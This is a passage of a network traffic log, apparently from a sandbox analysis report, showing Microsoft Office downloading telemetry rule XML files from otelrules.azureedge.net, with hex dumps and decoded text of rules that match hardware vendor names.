                                                                                                                                                                                        2024-11-24 01:13:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        81192.168.2.54981213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:52 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:53 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                        x-ms-request-id: 23cbbb45-601e-0084-4e3d-3c6b3f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011353Z-15b8b599d88tmlzshC1TEB4xpn00000003g000000000pp2v
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:53 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        82192.168.2.54981313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:53 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:53 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                                        x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011353Z-178bfbc474bwlrhlhC1NYCy3kg000000056g00000000f794
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:53 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        83192.168.2.54981413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:53 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:53 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                        x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011353Z-174c587ffdfcj798hC1TEB9bq400000003u000000000mdx2
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:54 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        84192.168.2.54981513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:53 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:53 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                        x-ms-request-id: 3aa21312-901e-0016-730f-3defe9000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011353Z-178bfbc474bbbqrhhC1NYCvw7400000005g00000000020g4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        85192.168.2.54982613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:55 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:55 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                                        x-ms-request-id: 80be2a3e-601e-003d-77f5-3c6f25000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011355Z-178bfbc474bv7whqhC1NYC1fg400000005b000000000373u
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        86192.168.2.54982513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:55 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:55 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                        x-ms-request-id: a5f5ebba-f01e-003f-29f6-3cd19d000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011355Z-178bfbc474bpscmfhC1NYCfc2c00000003tg00000000f4yn
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        87192.168.2.54982713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:55 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:55 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                        x-ms-request-id: 4d626343-d01e-0028-4b44-3c7896000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011355Z-178bfbc474bwlrhlhC1NYCy3kg000000059g0000000070b6
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:56 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        88192.168.2.54982813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:55 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:56 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                        x-ms-request-id: 14aff01d-f01e-005d-5831-3d13ba000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011356Z-174c587ffdf9xbcchC1TEBxkz400000003q0000000000wdm
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        89192.168.2.54982913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:56 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:56 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                        x-ms-request-id: 5556881b-d01e-008e-6531-3c387a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011356Z-178bfbc474btvfdfhC1NYCa2en00000005a000000000bnu4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:56 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        90192.168.2.54984013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:57 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:57 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                        x-ms-request-id: c53d1c68-c01e-0079-4ae2-3de51a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
